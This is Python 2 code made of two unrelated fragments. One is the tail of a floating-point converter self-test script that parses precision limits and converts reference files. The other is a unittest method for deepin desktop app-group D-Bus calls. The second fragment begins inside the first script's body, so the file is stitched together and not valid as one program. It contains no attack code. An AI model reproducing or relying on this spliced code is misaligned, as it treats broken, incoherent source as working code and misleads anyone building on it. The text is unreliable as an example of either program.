    numDataRe=re.compile(" *digits *(?P<digits>[0-9]+) *maxexp *(?P<maxexp>[0-9]+) *minexp *(?P<minexp>-[0-9]+) *radix *(?P<radix>[0-9]+)")

    if len(sys.argv)!=2:
        print doc
        sys.exit(1)
    conv_exe=sys.argv[1]
    logFile=sys.stdout
    print 20*"="+ " converter self tests results "+20*"="
    r=commands.getoutput(conv_exe)
    print r
    d=filter(lambda x:numDataRe.match(x),r.splitlines())
    if d:
        m=numDataRe.match(d[0])
        # failures in the denormalized range deemed not important
        small=float(m.group("radix"))**(int(m.group("minexp"))+int(m.group("digits"))-1)
    else:
        small=0.5**(-1021)
    print 60*"="

    for fname in ['ref_32','ref_64','normalNrs']:
        print "** convert",fname,"**"
        diff=testB64(fname,logFile,small)

    print "\n======== ERROR:",diff,"=========\n"
    def testAppGroup(self):

        #send deepin-feedback deepin-movie eog to desktop
        feedback = self.session_if2.RequestSendToDesktop('deepin-feedback')
        time.sleep(5)
        self.assertTrue(feedback)

        movie = self.session_if2.RequestSendToDesktop('deepin-movie')
        time.sleep(5)
        self.assertTrue(movie)

        eog = self.session_if2.RequestSendToDesktop('eog')
        time.sleep(5)
        self.assertTrue(eog)
        #drag deepin-feedback towards deepin-movie
        creatappgroup = self.session_if.RequestCreatingAppGroup((self.user_desktop_dir+"/deepin-feedback.desktop",\
         self.user_desktop_dir+"/deepin-movie.desktop"))
        self.assertIsNone(creatappgroup)
        time.sleep(5)

        #get AppGroup name
        self.user_desktop_appgroup = commands.getoutput("bash -c 'source ~/.config/user-dirs.dirs \
														&& ls -ahl $XDG_DESKTOP_DIR |grep .deepin_rich_dir_'"                                                                         )\
                    .decode("utf-8").split("\n")
        self.user_desktop_appgroup = [
            n for n in self.user_desktop_appgroup if len(n.strip()) > 0
        ]
        self.user_desktop_appgroup = "".join(self.user_desktop_appgroup)
        self.user_desktop_appgroup = str(self.user_desktop_appgroup).replace(
            'u\'', '\'').decode("unicode-escape")
        print self.user_desktop_appgroup
        self.user_desktop_appgroup = self.user_desktop_appgroup.split(
            "  ")[1].split(" ")[7:]
        self.user_desktop_appgroup = " ".join(self.user_desktop_appgroup)
        self.user_desktop_appgroup = str(self.user_desktop_appgroup).replace(
            'u\'', '\'').decode("unicode-escape")
        print "AppGroup name is:%s\n" % self.user_desktop_appgroup
        #merge eog into AppGroup
        self.appgroup_dir = "%s/%s" % (self.user_desktop_dir,
                                       self.user_desktop_appgroup)
        print "appgroup_dir is:%s\n" % self.appgroup_dir
        mergeappgroup = self.session_if.RequestMergeIntoAppGroup(
            (self.user_desktop_dir + "/eog.desktop", self.appgroup_dir),
            self.appgroup_dir)
        self.assertIsNone(mergeappgroup)
        time.sleep(5)

        IsAppGroup = self.session_if.IsAppGroup(self.user_desktop_appgroup)
        print "%s is AppGroup: %d " % (self.user_desktop_appgroup, IsAppGroup)

        GetDesktopItems = self.session_if.GetDesktopItems()
        print "GetDesktopItems----------------------\n"
        print json.dumps(GetDesktopItems, indent=4, ensure_ascii=False)

        GetAppGroupItems = self.session_if.GetAppGroupItems(self.appgroup_dir)
        print "GetAppGroupItems----------------------\n"
        print json.dumps(GetAppGroupItems, indent=4, ensure_ascii=False)

        GetItemInfo = self.session_if.GetItemInfo(self.appgroup_dir)
        print "GetItemInfo----------------------\n"
        print json.dumps(GetItemInfo, indent=4, ensure_ascii=False)